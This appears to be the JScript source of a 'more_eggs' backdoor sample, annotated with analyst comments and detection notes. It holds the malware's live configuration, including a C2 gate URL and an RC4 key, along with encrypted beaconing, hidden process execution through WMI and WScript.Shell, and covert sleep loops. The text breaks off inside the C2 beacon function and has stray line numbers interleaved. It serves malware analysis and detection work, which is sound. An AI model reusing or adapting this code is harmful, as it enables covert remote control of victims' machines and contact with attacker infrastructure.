///////////////////////////////////////////////////////////////////////////////////////
////////////////////////// more_eggs sample ///////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
/////// source: https://twitter.com/VK_Intel/status/1286747453849468929 ///////////////
///////////////////////////////////////////////////////////////////////////////////////
function anonymous() {
// --- embedded configuration ---------------------------------------------------------
// Static values carried by this build. For an analyst these are the first indicators to
// extract; usages that are not visible in this excerpt are marked as such.
var BV = "6.6a";                                     // build / version tag of the sample
var Gate = "https://maps.doaglas.com/update/check";  // C2 endpoint; check_Host() POSTs here
var hit_each = 10;                                   // NOTE(review): only used in rcon_max below in this view — presumably a check-in interval (minutes); confirm in the dispatch loop
var error_retry = 2;                                 // not referenced in this excerpt
var restart_h = 4;                                   // feeds rcon_max; presumably hours between restarts — confirm
var rcon_max = hit_each * (restart_h * 60) / (hit_each * hit_each);  // 10 * 240 / 100 == 24
var Rkey = "whVbBSXoQHLa9sfFVZ";                     // RC4 key prefix; check_Host() appends a 2-char nonce
var rcon_now = 0;                                    // counter paired with rcon_max — increment site not in this excerpt
var gtfo = false;                                    // exit flag — consumer not in this excerpt
var selfdel = false;                                 // self-delete flag — consumer not in this excerpt
var table = [];                                      // CRC-32 lookup table, filled by crc32_init()
var Build = "";                                      // OS build suffix, set by os_version_no_cmd()
var PCN = "";                                        // not set in this excerpt (name suggests computer name — verify)
var UNM = "";                                        // not set in this excerpt (name suggests user name — verify)
var SYSTEM = 0;                                      // when 1, check_Host() always uses the ServerXMLHTTP transport
var rootK = "HKCU";                                  // registry hive prefix — uses not in this excerpt
var workingDir = "";                                 // not used in this excerpt
var main_mitm = "";                                  // not used in this excerpt
var xApp = "";                                       // not used in this excerpt
var xTmp = "";                                       // temp-directory prefix for scratch files (cAV, os_version_no_cmd, local_ip2)
var PreserveH = "";                                  // not used in this excerpt
var xStore = "";                                     // not used in this excerpt
// basE91 alphabet (91 symbols) used by base91_encode()/base91_decode().
var set = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!#$%&()*+,./:;<=>?@[]^_`{|}~"';
// Standard base64 alphabet plus '=' at index 64, used by base64_encode().
var b64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
// Thin ActiveXObject factory; every COM / WSH object the sample uses is created here,
// so hooking or logging this one call site covers all of them.
function obj(xString) {
    return new ActiveXObject(xString);
}
// HTTP transports, created once at startup.
// `con` is the client-side XMLHTTP (6.0, then 3.0, then the legacy ProgID);
// `xhr` is ServerXMLHTTP (6.0, then 3.0), which is the one that later receives
// setTimeouts() / setOption() calls. Neither creation is guarded beyond the fallbacks.
var con;
try {
    con = obj("Msxml2.XMLHTTP.6.0");
} catch (e) {
    try {
        con = obj("Msxml2.XMLHTTP.3.0");
    } catch (e2) {
        con = obj("Microsoft.XMLHTTP");
    }
}
var xhr;
try {
    xhr = obj("Msxml2.ServerXMLHTTP.6.0");
} catch (e3) {
    xhr = obj("Msxml2.ServerXMLHTTP.3.0");
}
// Internet-reachability probe.
// method 0 uses `con` (XMLHTTP), method 1 uses `xhr` (ServerXMLHTTP). If open() or
// send() throws under method 0 the call retries once as method 1; under method 1 it
// returns false. Returns true only when the synchronous GET yields HTTP 200 and a body
// loosely equal to 'This is another XSL namespace\n'; otherwise false.
// Detection note: a script host fetching http://www.w3.org/1999/XSL/Format is the
// observable precondition for the rest of the sample — without egress this returns false.
function check_Net(method) {
    var Resp = false;
    var conz1;
    var t11 = "";
    if (method === 1) {
        conz1 = xhr;
    } else {
        conz1 = con;
    }
    try {
        conz1.open("GET", "http://www.w3.org/1999/XSL/Format", false);
    } catch (e1) {
        if (method === 0) {
            return check_Net(1);
        } else {
            return false;
        }
    }
    // The request is synchronous (third open() arg is false), so this handler has
    // already run by the time send() returns and Resp is read.
    conz1.onreadystatechange = function() {
        if (conz1.readyState === 4) {
            if (conz1.status === 200) {
                t11 = conz1.responseText;
                if (t11) {
                    if (t11 == 'This is another XSL namespace\n') {
                        Resp = true;
                    } else {
                        Resp = false;
                    }
                } else {
                    Resp = false;
                }
            } else {
                Resp = false;
            }
        }
    };
    try {
        conz1.send();
    } catch (e2) {
        if (method === 0) {
            return check_Net(1);
        } else {
            return false;
        }
    }
    return Resp;
}
// Length gate: false for an empty string, true when min <= length <= max.
// Any other length falls off the end and yields undefined (not false) — callers
// in this file compare the result with `=== true`, so undefined is treated as a miss.
function cLength(mstr, min, max) {
    var n = mstr.length;
    if (n === 0) {
        return false;
    }
    if (n >= min && (n <= max)) {
        return true;
    }
}
112
113
// Uniform-ish random integer in the inclusive range [ceil(min), floor(max)].
// Uses Math.random(), so the values are not unpredictable — relevant when the
// output is used as a nonce (see check_Host).
function rInt(min, max) {
    min = Math.ceil(min);
    max = Math.floor(max);
    return Math.floor(Math.random() * (max - min + 1)) + min;
}
// Random alphanumeric string of `len` characters drawn from [A-Za-z0-9] (62 symbols)
// with Math.random(). The do/while body runs at least once, so len <= 0 still
// produces a single character.
function rStr(len) {
    var xRnd = "";
    var i;
    var randomPoz;
    var charSet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
    var clen = 62;
    i = 0;
    do {
        randomPoz = Math.floor(Math.random() * clen);
        xRnd += charSet.substring(randomPoz, randomPoz + 1);
        i += 1;
    } while (i < len);
    return xRnd;
}
133
134
// Busy-wait body used by waitfor()/waitfor2(): one synchronous GET to
// http://8.8.8.8/<2-16 random chars> with short ServerXMLHTTP timeouts
// (resolve/connect 5 s, send/receive 10 s). Returns false if the request throws,
// otherwise undefined; the result is never used by the callers in this file.
// Detection note: repeated GETs to 8.8.8.8 with random paths from a script host
// during an otherwise idle interval is this sample's "sleep".
function fuck_js() {
    var xNow = rInt(2, 16);
    var rNow = rStr(xNow);
    try {
        xhr.setTimeouts(5000, 5000, 10000, 10000);
        xhr.open("GET", "http://8.8.8.8/" + rNow, false);
        xhr.send();
    } catch (e9) {
        return false;
    }
}
// True if Scripting.FileSystemObject reports that `xpath` exists as a file;
// false when it does not or when the COM call throws.
function fexist(xpath) {
    var fso;
    try {
        fso = obj("Scripting.FileSystemObject");
        if (fso.FileExists(xpath)) {
            return true;
        } else {
            return false;
        }
    } catch (feer) {
        return false;
    }
}
159
160
// Registry presence check via WScript.Shell.RegRead.
// Returns true when the read returns a non-null value, false when RegRead throws
// (which is how a missing key/value surfaces), and undefined for a null read.
function rexist(xpath) {
    var sh;
    var rdata;
    try {
        sh = obj("Wscript.shell");
        rdata = sh.RegRead(xpath);
        if (rdata !== null) {
            return true;
        }
    } catch (e71) {
        return false;
    }
}
// Reads environment variable `xVar` through WScript.Shell.Environment:
// from the "SYSTEM" collection when xSystem === 1, else from "PROCESS".
// No error handling — a COM failure propagates to the caller.
function myEnv(xVar, xSystem) {
    var a1;
    var rEnv;
    a1 = obj("WScript.Shell");
    if (xSystem === 1) {
        rEnv = a1.environment("SYSTEM");
    } else {
        rEnv = a1.environment("PROCESS");
    }
    return rEnv(xVar);
}
// Architecture fingerprint: "64" when the SYSTEM-level PROCESSOR_ARCHITECTURE is
// exactly "AMD64", otherwise "86" (any other value, including ARM64, maps to "86").
function myBits() {
    var xBits;
    xBits = myEnv("PROCESSOR_ARCHITECTURE", 1);
    if (xBits === "AMD64") {
        return "64";
    } else {
        return "86";
    }
}
// RC4 over a JS string: standard 256-entry key schedule (KSA) followed by the
// PRGA, XORing each UTF-16 code unit of `str` with one keystream byte.
// Symmetric — the same call decrypts. Returns "" when key or str is falsy.
// Note: there is no 8-bit masking, so code units above 0xFF keep their high byte
// and only the low byte is affected by the keystream.
function zzzz4(key, str) {
    var s = [];
    var j = 0;
    var x;
    var res = "";
    var i;
    var y;
    if (key && str) {
        // KSA: identity permutation ...
        i = 0;
        do {
            s[i] = i;
            i += 1;
        } while (i < 256);
        // ... then key-dependent swaps.
        i = 0;
        do {
            j = (j + s[i] + key.charCodeAt(i % key.length)) % 256;
            x = s[i];
            s[i] = s[j];
            s[j] = x;
            i += 1;
        } while (i < 256);
        // PRGA: one keystream byte per input code unit.
        i = 0;
        j = 0;
        y = 0;
        do {
            i = (i + 1) % 256;
            j = (j + s[i]) % 256;
            x = s[i];
            s[i] = s[j];
            s[j] = x;
            res += String.fromCharCode(str.charCodeAt(y) ^ s[(s[i] + s[j]) % 256]);
            y += 1;
        } while (y < str.length);
    }
    return res;
}
// RC4 over a byte array (same KSA/PRGA as zzzz4, but input and output are numeric
// arrays instead of strings). Returns [] when key or xArray is falsy.
// Note the parameter order differs from zzzz4: (data, key) here, (key, data) there.
function zzz4Bytes(xArray, key) {
    var s = [];
    var j = 0;
    var x;
    var outBytes = [];
    var i;
    var y;
    if (key && xArray) {
        // KSA
        i = 0;
        do {
            s[i] = i;
            i += 1;
        } while (i < 256);
        i = 0;
        do {
            j = (j + s[i] + key.charCodeAt(i % key.length)) % 256;
            x = s[i];
            s[i] = s[j];
            s[j] = x;
            i += 1;
        } while (i < 256);
        // PRGA
        i = 0;
        j = 0;
        y = 0;
        do {
            i = (i + 1) % 256;
            j = (j + s[i]) % 256;
            x = s[i];
            s[i] = s[j];
            s[j] = x;
            outBytes.push(xArray[y] ^ s[(s[i] + s[j]) % 256]);
            y += 1;
        } while (y < xArray.length);
    }
    return outBytes;
}
function tB(htc) {
271
var y = [];
272
y[0xC7] = 0x80;
273
y[0xFC] = 0x81;
274
y[0xE9] = 0x82;
275
y[0xE2] = 0x83;
276
y[0xE4] = 0x84;
277
y[0xE0] = 0x85;
278
y[0xE5] = 0x86;
279
y[0xE7] = 0x87;
280
y[0xEA] = 0x88;
281
y[0xEB] = 0x89;
282
y[0xE8] = 0x8A;
283
y[0xEF] = 0x8B;
284
y[0xEE] = 0x8C;
285
y[0xEC] = 0x8D;
286
y[0xC4] = 0x8E;
287
y[0xC5] = 0x8F;
288
y[0xC9] = 0x90;
289
y[0xE6] = 0x91;
290
y[0xC6] = 0x92;
291
y[0xF4] = 0x93;
292
y[0xF6] = 0x94;
293
y[0xF2] = 0x95;
294
y[0xFB] = 0x96;
295
y[0xF9] = 0x97;
296
y[0xFF] = 0x98;
297
y[0xD6] = 0x99;
298
y[0xDC] = 0x9A;
299
y[0xA2] = 0x9B;
300
y[0xA3] = 0x9C;
301
y[0xA5] = 0x9D;
302
y[0x20A7] = 0x9E;
303
y[0x192] = 0x9F;
304
y[0xE1] = 0xA0;
305
y[0xED] = 0xA1;
306
y[0xF3] = 0xA2;
307
y[0xFA] = 0xA3;
308
y[0xF1] = 0xA4;
309
y[0xD1] = 0xA5;
310
y[0xAA] = 0xA6;
311
y[0xBA] = 0xA7;
312
y[0xBF] = 0xA8;
313
y[0x2310] = 0xA9;
314
y[0xAC] = 0xAA;
315
y[0xBD] = 0xAB;
316
y[0xBC] = 0xAC;
317
y[0xA1] = 0xAD;
318
y[0xAB] = 0xAE;
319
y[0xBB] = 0xAF;
320
y[0x2591] = 0xB0;
321
y[0x2592] = 0xB1;
322
y[0x2593] = 0xB2;
323
y[0x2502] = 0xB3;
324
y[0x2524] = 0xB4;
325
y[0x2561] = 0xB5;
326
y[0x2562] = 0xB6;
327
y[0x2556] = 0xB7;
328
y[0x2555] = 0xB8;
329
y[0x2563] = 0xB9;
330
y[0x2551] = 0xBA;
331
y[0x2557] = 0xBB;
332
y[0x255D] = 0xBC;
333
y[0x255C] = 0xBD;
334
y[0x255B] = 0xBE;
335
y[0x2510] = 0xBF;
336
y[0x2514] = 0xC0;
337
y[0x2534] = 0xC1;
338
y[0x252C] = 0xC2;
339
y[0x251C] = 0xC3;
340
y[0x2500] = 0xC4;
341
y[0x253C] = 0xC5;
342
y[0x255E] = 0xC6;
343
y[0x255F] = 0xC7;
344
y[0x255A] = 0xC8;
345
y[0x2554] = 0xC9;
346
y[0x2569] = 0xCA;
347
y[0x2566] = 0xCB;
348
y[0x2560] = 0xCC;
349
y[0x2550] = 0xCD;
350
y[0x256C] = 0xCE;
351
y[0x2567] = 0xCF;
352
y[0x2568] = 0xD0;
353
y[0x2564] = 0xD1;
354
y[0x2565] = 0xD2;
355
y[0x2559] = 0xD3;
356
y[0x2558] = 0xD4;
357
y[0x2552] = 0xD5;
358
y[0x2553] = 0xD6;
359
y[0x256B] = 0xD7;
360
y[0x256A] = 0xD8;
361
y[0x2518] = 0xD9;
362
y[0x250C] = 0xDA;
363
y[0x2588] = 0xDB;
364
y[0x2584] = 0xDC;
365
y[0x258C] = 0xDD;
366
y[0x2590] = 0xDE;
367
y[0x2580] = 0xDF;
368
y[0x3B1] = 0xE0;
369
y[0xDF] = 0xE1;
370
y[0x393] = 0xE2;
371
y[0x3C0] = 0xE3;
372
y[0x3A3] = 0xE4;
373
y[0x3C3] = 0xE5;
374
y[0xB5] = 0xE6;
375
y[0x3C4] = 0xE7;
376
y[0x3A6] = 0xE8;
377
y[0x398] = 0xE9;
378
y[0x3A9] = 0xEA;
379
y[0x3B4] = 0xEB;
380
y[0x221E] = 0xEC;
381
y[0x3C6] = 0xED;
382
y[0x3B5] = 0xEE;
383
y[0x2229] = 0xEF;
384
y[0x2261] = 0xF0;
385
y[0xB1] = 0xF1;
386
y[0x2265] = 0xF2;
387
y[0x2264] = 0xF3;
388
y[0x2320] = 0xF4;
389
y[0x2321] = 0xF5;
390
y[0xF7] = 0xF6;
391
y[0x2248] = 0xF7;
392
y[0xB0] = 0xF8;
393
y[0x2219] = 0xF9;
394
y[0xB7] = 0xFA;
395
y[0x221A] = 0xFB;
396
y[0x207F] = 0xFC;
397
y[0xB2] = 0xFD;
398
y[0x25A0] = 0xFE;
399
y[0xA0] = 0xFF;
400
var ami = [];
401
var mi;
402
var renderer;
403
var atends;
404
mi = 0;
405
do {
406
renderer = htc.charCodeAt(mi);
407
if (renderer < 128) {
408
atends = renderer;
409
} else {
410
atends = y[renderer];
411
}
412
ami.push(atends);
413
mi += 1;
414
} while (mi < htc.length);
415
return ami;
416
}
417
418
function tS(arenderer) {
419
var x = [];
420
x[0x80] = 0x00C7;
421
x[0x81] = 0x00FC;
422
x[0x82] = 0x00E9;
423
x[0x83] = 0x00E2;
424
x[0x84] = 0x00E4;
425
x[0x85] = 0x00E0;
426
x[0x86] = 0x00E5;
427
x[0x87] = 0x00E7;
428
x[0x88] = 0x00EA;
429
x[0x89] = 0x00EB;
430
x[0x8A] = 0x00E8;
431
x[0x8B] = 0x00EF;
432
x[0x8C] = 0x00EE;
433
x[0x8D] = 0x00EC;
434
x[0x8E] = 0x00C4;
435
x[0x8F] = 0x00C5;
436
x[0x90] = 0x00C9;
437
x[0x91] = 0x00E6;
438
x[0x92] = 0x00C6;
439
x[0x93] = 0x00F4;
440
x[0x94] = 0x00F6;
441
x[0x95] = 0x00F2;
442
x[0x96] = 0x00FB;
443
x[0x97] = 0x00F9;
444
x[0x98] = 0x00FF;
445
x[0x99] = 0x00D6;
446
x[0x9A] = 0x00DC;
447
x[0x9B] = 0x00A2;
448
x[0x9C] = 0x00A3;
449
x[0x9D] = 0x00A5;
450
x[0x9E] = 0x20A7;
451
x[0x9F] = 0x0192;
452
x[0xA0] = 0x00E1;
453
x[0xA1] = 0x00ED;
454
x[0xA2] = 0x00F3;
455
x[0xA3] = 0x00FA;
456
x[0xA4] = 0x00F1;
457
x[0xA5] = 0x00D1;
458
x[0xA6] = 0x00AA;
459
x[0xA7] = 0x00BA;
460
x[0xA8] = 0x00BF;
461
x[0xA9] = 0x2310;
462
x[0xAA] = 0x00AC;
463
x[0xAB] = 0x00BD;
464
x[0xAC] = 0x00BC;
465
x[0xAD] = 0x00A1;
466
x[0xAE] = 0x00AB;
467
x[0xAF] = 0x00BB;
468
x[0xB0] = 0x2591;
469
x[0xB1] = 0x2592;
470
x[0xB2] = 0x2593;
471
x[0xB3] = 0x2502;
472
x[0xB4] = 0x2524;
473
x[0xB5] = 0x2561;
474
x[0xB6] = 0x2562;
475
x[0xB7] = 0x2556;
476
x[0xB8] = 0x2555;
477
x[0xB9] = 0x2563;
478
x[0xBA] = 0x2551;
479
x[0xBB] = 0x2557;
480
x[0xBC] = 0x255D;
481
x[0xBD] = 0x255C;
482
x[0xBE] = 0x255B;
483
x[0xBF] = 0x2510;
484
x[0xC0] = 0x2514;
485
x[0xC1] = 0x2534;
486
x[0xC2] = 0x252C;
487
x[0xC3] = 0x251C;
488
x[0xC4] = 0x2500;
489
x[0xC5] = 0x253C;
490
x[0xC6] = 0x255E;
491
x[0xC7] = 0x255F;
492
x[0xC8] = 0x255A;
493
x[0xC9] = 0x2554;
494
x[0xCA] = 0x2569;
495
x[0xCB] = 0x2566;
496
x[0xCC] = 0x2560;
497
x[0xCD] = 0x2550;
498
x[0xCE] = 0x256C;
499
x[0xCF] = 0x2567;
500
x[0xD0] = 0x2568;
501
x[0xD1] = 0x2564;
502
x[0xD2] = 0x2565;
503
x[0xD3] = 0x2559;
504
x[0xD4] = 0x2558;
505
x[0xD5] = 0x2552;
506
x[0xD6] = 0x2553;
507
x[0xD7] = 0x256B;
508
x[0xD8] = 0x256A;
509
x[0xD9] = 0x2518;
510
x[0xDA] = 0x250C;
511
x[0xDB] = 0x2588;
512
x[0xDC] = 0x2584;
513
x[0xDD] = 0x258C;
514
x[0xDE] = 0x2590;
515
x[0xDF] = 0x2580;
516
x[0xE0] = 0x03B1;
517
x[0xE1] = 0x00DF;
518
x[0xE2] = 0x0393;
519
x[0xE3] = 0x03C0;
520
x[0xE4] = 0x03A3;
521
x[0xE5] = 0x03C3;
522
x[0xE6] = 0x00B5;
523
x[0xE7] = 0x03C4;
524
x[0xE8] = 0x03A6;
525
x[0xE9] = 0x0398;
526
x[0xEA] = 0x03A9;
527
x[0xEB] = 0x03B4;
528
x[0xEC] = 0x221E;
529
x[0xED] = 0x03C6;
530
x[0xEE] = 0x03B5;
531
x[0xEF] = 0x2229;
532
x[0xF0] = 0x2261;
533
x[0xF1] = 0x00B1;
534
x[0xF2] = 0x2265;
535
x[0xF3] = 0x2264;
536
x[0xF4] = 0x2320;
537
x[0xF5] = 0x2321;
538
x[0xF6] = 0x00F7;
539
x[0xF7] = 0x2248;
540
x[0xF8] = 0x00B0;
541
x[0xF9] = 0x2219;
542
x[0xFA] = 0x00B7;
543
x[0xFB] = 0x221A;
544
x[0xFC] = 0x207F;
545
x[0xFD] = 0x00B2;
546
x[0xFE] = 0x25A0;
547
x[0xFF] = 0x00A0;
548
var bb = [];
549
var leppek = "";
550
var atends;
551
var renderer;
552
var mi;
553
mi = 0;
554
do {
555
atends = arenderer[mi];
556
if (atends < 128) {
557
renderer = atends;
558
} else {
559
renderer = x[atends];
560
}
561
bb.push(String.fromCharCode(renderer));
562
mi += 1;
563
} while (mi < arenderer.length);
564
leppek = bb.join("");
565
return leppek;
566
}
// True when the first two bytes of the array are 0x4D 0x5A ("MZ"), i.e. the buffer
// starts with a DOS/PE executable header. Does not validate anything beyond that.
function mZcheck(arenderer) {
    if (arenderer[0] === 0x4D && arenderer[1] === 0x5a) {
        return true;
    } else {
        return false;
    }
}
// Random integer in [0, 65535] used as a scratch-file name stem by tempNow().
// Can legitimately return 0, which tempNow() treats as "no name".
function tempExtra() {
    return Math.floor(Math.random() * 65536);
}
// Scratch-file name from FileSystemObject.GetTempName(); falls back to the fixed
// name "22222222.txt" when GetTempName returns nothing or the COM call throws.
function randomTmp() {
    var fso2;
    var t1;
    var xelse = "22222222.txt";
    try {
        fso2 = obj("Scripting.FileSystemObject");
        t1 = fso2.GetTempName();
        if (t1) {
            return t1;
        } else {
            return xelse;
        }
    } catch (e0) {
        return xelse;
    }
}
596
597
// Scratch-file name: "<random 0-65535>.txt", or randomTmp() when tempExtra()
// happened to return 0. Callers prefix this with xTmp to build a full path.
function tempNow() {
    var xout = tempExtra();
    if (!xout) {
        xout = randomTmp();
    } else {
        xout += ".txt";
    }
    return xout;
}
// Deletes `filespec` if it exists. Returns false when the COM call throws and
// undefined otherwise (success and "did not exist" are indistinguishable).
// Used to clean up the temp files that carry command output (cAV, local_ip2, ...).
function dFile(filespec) {
    var fso;
    try {
        fso = obj("Scripting.FileSystemObject");
        if (fso.FileExists(filespec)) {
            fso.DeleteFile(filespec);
        }
    } catch (e8) {
        return false;
    }
}
// Resolves a special folder by CSIDL through Shell.Application.NameSpace() and
// returns its filesystem path; false when the namespace or its Self item is null
// or when any COM call throws.
function sFolder(CSIDL) {
    var objFolder;
    try {
        var app = obj("Shell.Application");
        objFolder = app.NameSpace(CSIDL);
        if (objFolder !== null) {
            var objFolderItem;
            objFolderItem = objFolder.Self;
            if (objFolderItem !== null) {
                return objFolderItem.Path;
            } else {
                return false;
            }
        } else {
            return false;
        }
    } catch (e1z0) {
        return false;
    }
}
// basE91 encoder over the 91-symbol alphabet in the global `set`.
// Input is consumed one code unit at a time (only the low bits matter once the
// 13/14-bit groups are masked); output is two alphabet chars per group, plus a
// 1-2 char tail. Returns undefined for a falsy input (no `else` branch).
// This is the wire encoding of the beacon body in check_Host().
function base91_encode(data) {
    if (data) {
        var len = data.length;
        var ret = "";
        var n = 0;      // bits currently buffered in b
        var b = 0;      // bit accumulator
        var v = 0;
        var i = 0;
        do {
            b = b | data.charCodeAt(i) << n;
            n = n + 8;
            if (n > 13) {
                // Emit 13 bits if their value exceeds 88, otherwise 14 bits (basE91 rule).
                v = b & 8191;
                if (v > 88) {
                    b = b >> 13;
                    n = n - 13;
                } else {
                    v = b & 16383;
                    b = b >> 14;
                    n = n - 14;
                }
                ret += set.charAt(v % 91) + set.charAt(v / 91 | 0);
            }
            i = i + 1;
        } while (i < len);
        // Flush remaining bits.
        if (n) {
            ret += set.charAt(b % 91);
            if (n > 7 || b > 90) {
                ret += set.charAt(b / 91 | 0);
            }
        }
        return ret;
    }
}
674
675
// basE91 decoder, inverse of base91_encode(). Characters not in `set` are skipped
// (indexOf === -1), so whitespace in the input is tolerated. Produces a string of
// 8-bit code units. Returns undefined for a falsy input.
function base91_decode(data) {
    if (data) {
        var len = data.length;
        var ret = "";
        var b = 0;      // bit accumulator
        var n = 0;      // bits buffered in b
        var v = -1;     // -1 means "waiting for the first char of a pair"
        var p;
        var i = 0;
        do {
            p = set.indexOf(data.charAt(i));
            if (p !== -1) {
                if (v < 0) {
                    v = p;
                } else {
                    v = v + p * 91;
                    b = b | v << n;
                    // Mirror of the encoder's 13/14-bit choice.
                    if ((v & 8191) > 88) {
                        n = n + 13;
                    } else {
                        n = n + 14;
                    }
                    do {
                        ret += String.fromCharCode(b & 0xff);
                        b = b >> 8;
                        n = n - 8;
                    } while (n > 7);
                    v = -1;
                }
            }
            i = i + 1;
        } while (i < len);
        // A dangling single symbol contributes its remaining bits.
        if (v > -1) {
            ret += String.fromCharCode((b | v << n) & 0xff);
        }
        return (ret);
    }
}
713
714
// Hand-rolled base64 over the code units of `data`, using the global `b64`
// alphabet (index 64 is '='). Returns undefined for a falsy input.
// Caveat (not fixed here): padding is decided by truthiness of b and c, so a
// 0x00 code unit in the 2nd or 3rd slot of a triple is indistinguishable from
// end-of-input and is emitted as '=' padding. Only the low 8 bits of each code
// unit contribute to the output.
function base64_encode(data) {
    if (data) {
        var result = '';
        var i = 0;
        var b1;
        var b2;
        var b3;
        var b4;
        var n = data.length;
        var a;
        var b;
        var c;
        do {
            a = data.charCodeAt(i++);
            b = data.charCodeAt(i++);
            c = data.charCodeAt(i++);
            // charCodeAt past the end yields NaN; coerce to 0.
            a = a ? a : 0;
            b = b ? b : 0;
            c = c ? c : 0;
            b1 = (a >> 2) & 0x3F;
            b2 = ((a & 0x3) << 4) | ((b >> 4) & 0xF);
            b3 = ((b & 0xF) << 2) | ((c >> 6) & 0x3);
            b4 = c & 0x3F;
            if (!b) {
                b3 = 64;
                b4 = 64;
            } else if (!c) {
                b4 = 64;
            }
            result = result + b64.charAt(b1) + b64.charAt(b2) + b64.charAt(b3) + b64.charAt(b4);
            b1 = 0;
            b2 = 0;
            b3 = 0;
            b4 = 0;
            a = 0;
            b = 0;
            c = 0;
        } while (i < n);
        return result;
    }
}
755
756
// Runs `sCom` through WScript.Shell.Run with window style 0 (hidden).
// wait1 == 1 (loose compare) makes Run block until the child exits; anything else
// returns immediately. Returns true on a successful Run call, false if it throws.
// This is the fallback path of wmi_command(); the child's parent is the script host.
function cmd_command(sCom, wait1) {
    var oShell;
    var w11;
    try {
        oShell = obj("Wscript.Shell");
        if (wait1 == 1) {
            w11 = 1;
        } else {
            w11 = 0;
        }
        // Redundant: w11 is already 0 or 1 here.
        if (!w11) {
            w11 = 0;
        }
        oShell.Run(sCom, 0, w11);
        return true;
    } catch (ec1) {
        return false;
    }
}
// Runs `sCom` via WMI Win32_Process.Create with ShowWindow = 0 (hidden).
// If Create reports a non-zero ReturnValue, or any COM call throws, it falls back
// to cmd_command(sCom, wait). When wait == 1 it blocks by polling
// __InstanceDeletionEvent until the created PID disappears. Returns true on the
// WMI path, or whatever cmd_command() returns on the fallback path.
// Detection note: on the WMI path the child is spawned by the WMI provider host,
// not by wscript/cscript, so parent-process rules keyed on the script host miss it.
function wmi_command(sCom, wait) {
    try {
        var loc = obj("WbemScripting.SWbemLocator");
        var svc = loc.ConnectServer(".", "root\\cimv2");
        var objStartup = svc.Get("Win32_ProcessStartup").SpawnInstance_();
        objStartup.ShowWindow = 0;
        var objProcess = svc.Get("Win32_Process");
        var objInParam = objProcess.Methods_("Create").inParameters.SpawnInstance_();
        objInParam.Properties_.Item("CommandLine").Value = sCom;
        objInParam.Properties_.Item("ProcessStartupInformation").Value = objStartup;
        var objOutParams = svc.ExecMethod("Win32_Process", "Create", objInParam);
        if (objOutParams.ReturnValue !== 0) {
            return cmd_command(sCom, wait);
        }
        if (wait == 1) {
            var cPid = objOutParams.ProcessId;
            var eventObj;
            // Synchronous wait: nextEvent() blocks until a process-deletion event arrives.
            var eventSrc = svc.ExecNotificationQuery("SELECT * FROM __InstanceDeletionEvent Within 1 Where TargetInstance ISA 'Win32_Process'");
            while (true) {
                eventObj = eventSrc.nextEvent();
                if (eventObj.TargetInstance.ProcessID == cPid) {
                    break;
                }
            }
        }
        return true;
    } catch (ec1) {
        return cmd_command(sCom, wait);
    }
}
806
807
// Delay of `sMinutes` implemented as a busy loop that repeatedly calls fuck_js()
// (a throw-away HTTP GET) until the wall clock passes the limit, then re-enters
// main(). main() is not defined in this excerpt. No sleep primitive is used, so
// the script host stays busy for the whole interval.
function waitfor(sMinutes) {
    var limit = Date.parse(Date()) + (sMinutes * 60000);
    while (Date.parse(Date()) < limit) {
        fuck_js();
    }
    main();
}
// Delay of `sMinutes` that outsources the sleep to typeperf.exe: one sample of
// "\System\Processor Queue Length" with a sample interval of sMinutes*60 seconds,
// run through wmi_command() with wait=1. On success it calls main(); if the
// command fails or throws it falls back to the busy-wait waitfor(). Returns
// false for a falsy sMinutes. main() is not defined in this excerpt.
// Detection note: typeperf.exe launched with "-si <seconds> -sc 1" from a script
// host (or WmiPrvSE) is this sample's sleep primitive.
function wmi_waitfor(sMinutes) {
    var ret88;
    if (!sMinutes) {
        return false;
    }
    var seconds = sMinutes * 60;
    var sec2 = seconds.toString();
    try {
        ret88 = wmi_command('typeperf.exe "\\System\\Processor Queue Length" -si ' + sec2 + ' -sc 1', 1);
        if (ret88 == true) {
            main();
        } else {
            waitfor(sMinutes);
        }
    } catch (ewmi) {
        return waitfor(sMinutes);
    }
}
// Same busy-wait as waitfor(), but the continuation is go() and only when
// iGo === 1; otherwise the function simply returns after the delay.
// go() is not defined in this excerpt.
function waitfor2(sMinutes, iGo) {
    var xlmt;
    xlmt = Date.parse(Date()) + (sMinutes * 60000);
    while (Date.parse(Date()) < xlmt) {
        fuck_js();
    }
    if (iGo === 1) {
        go();
    }
}
// typeperf-based delay like wmi_waitfor(), with go() as the continuation when
// iGo === 1; falls back to waitfor2(sMinutes, iGo) if the command fails or throws.
// Returns false for a falsy sMinutes. go() is not defined in this excerpt.
function wmi_waitfor2(sMinutes, iGo) {
    var ret88;
    if (!sMinutes) {
        return false;
    }
    var seconds = sMinutes * 60;
    var sec2 = seconds.toString();
    try {
        ret88 = wmi_command('typeperf.exe "\\System\\Processor Queue Length" -si ' + sec2 + ' -sc 1', 1);
        if (ret88 == true) {
            if (iGo === 1) {
                go();
            }
        } else {
            waitfor2(sMinutes, iGo);
        }
    } catch (ewmi) {
        return waitfor2(sMinutes, iGo);
    }
}
// Strips every character outside printable ASCII (0x20-0x7E) from `str`.
// Returns the string "0" (not an empty string) when the input is falsy, when
// toString()/replace throws, or when nothing printable remains — "0" is this
// sample's generic "no value" sentinel for fingerprint fields.
function remove_non_ascii(str) {
    var ret1 = "";
    if ((!str) || (str === '')) {
        return "0";
    } else {
        try {
            str = str.toString();
            ret1 = str.replace(/[^\x20-\x7E]/g, '');
        } catch (un1) {
            return "0";
        }
    }
    if (!ret1) {
        return "0";
    } else {
        return ret1;
    }
}
// C2 liveness beacon to `Gate`.
// Transport: ServerXMLHTTP (`xhr`) when SYSTEM === 1 or method === 1, else XMLHTTP
// (`con`); an open()/send() failure with SYSTEM === 0 and method === 0 retries once
// with method 1, otherwise returns false.
// Body: "|<8-32 random alnum>|" RC4-encrypted with Rkey + a 2-char nonce, the nonce
// appended in clear, then basE91-encoded. The random token is never reused, so the
// body carries no host data — it only proves the gate answers.
// Result: true only on HTTP 200 with a body of 8..32 characters (cLength === true),
// else false. The response content itself is discarded here.
function check_Host(method) {
    var Resp = false;
    var Temp90 = "";
    var g11 = 0;
    var conz1;
    if (SYSTEM === 1) {
        conz1 = xhr;
    } else {
        if (method === 1) {
            conz1 = xhr;
        } else {
            conz1 = con;
        }
    }
    try {
        conz1.open("POST", Gate, false);
    } catch (e3) {
